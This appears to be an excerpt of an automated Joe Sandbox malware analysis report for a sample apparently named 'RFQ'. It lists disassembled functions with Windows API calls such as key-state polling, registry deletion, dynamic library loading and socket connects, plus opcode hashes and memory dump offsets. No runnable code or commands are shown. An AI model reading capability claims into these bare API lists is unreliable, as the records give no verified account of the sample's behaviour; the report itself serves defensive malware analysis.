                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                          • String ID: Line:
                                                                          • API String ID: 1874344091-1585850449
                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 0-1011021900
                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          • GetFocus.USER32 ref: 0046157B
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                          • String ID: %s%d
                                                                          • API String ID: 2645982514-1110647743
                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 3488606520-0
                                                                          • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                          • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 2449869053-0
                                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 3539004672-0
                                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID:
                                                                          • API String ID: 327565842-0
                                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
• Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
APIs
• GetWindowRect.USER32(?,?), ref: 00436A24
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
• Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
• Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
APIs
• SendMessageW.USER32 ref: 00449598
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
• _wcslen.LIBCMT ref: 0044960D
• _wcslen.LIBCMT ref: 0044961A
• SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: MessageSend$_wcslen$_wcspbrk
• String ID:
• API String ID: 1856069659-0
• Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
• Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
• Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(03046470,00000000,00000000,?,?,00000000), ref: 00447991
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
• Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
• Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
• Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
• Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
• Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
• Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(03041C90,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(03041C90,000000F1,00000001,00000000), ref: 00440E9A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
• Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
• Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
• Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
• Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
• Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
• Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
• Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 245547762-0
